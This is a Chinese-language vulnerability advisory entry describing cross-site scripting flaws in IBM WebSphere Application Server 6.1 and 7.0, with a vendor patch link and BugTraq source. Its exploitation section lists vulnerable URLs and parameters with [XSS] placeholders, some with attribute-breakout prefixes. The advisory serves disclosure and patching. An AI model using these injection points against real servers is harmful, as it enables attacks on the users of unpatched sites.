添加时间:
2009-05-08

系统编号:
WAVDB-01368
BUGTRAQ: 34001

影响版本:
IBM Websphere Application Server 6.1/7.0

程序介绍:

IBM Websphere应用服务器以Java和Servlet引擎为基础，支持多种HTTP服务，可帮助用户完成从开发、发布到维护交互式的动态网站的所有工作。

漏洞分析:

Websphere应用服务器的集成解决方案控制台、PlantsByWebSphere、Dynamic Query、Application Profile等模块和/scheduler/accountreport、/scriptwssamplesei/demo等脚本没有正确地过滤用户所提交的多个参数，远程攻击者可以通过向服务器提交恶意请求执行跨站脚本攻击。

漏洞利用:

http://[server]/ibm/console/[XSS]
http://[server]/ibm/console/[XSS].jsp
http://[server]/PlantsByWebSphere/[XSS]
http://[server]/PlantsByWebSphere/[XSS].jsp
http://[server]/PlantsByWebSphere/servlet/AccountServlet?action=login&updating=false&userid=[XSS]
http://[server]/PlantsByWebSphere/servlet/ShoppingServlet?action=shopping&category=[XSS]
http://[server]/DynamicQuery/EmployeeFinderWeb/EmployeeFinder.jsp?query=[XSS]
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?accountNumberToBeCreated=">[XSS] 
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?balance=[XSS] 
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?minibalance=">[XSS]

解决方案:
厂商补丁：
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://www-01.ibm.com/support/docview.wss?uid=swg1PK81212

信息来源:
<*来源：Polyakov Alexandr （research@dsecrg.ru）
链接：http://marc.info/?l=bugtraq&m=123852331909988&w=2
*>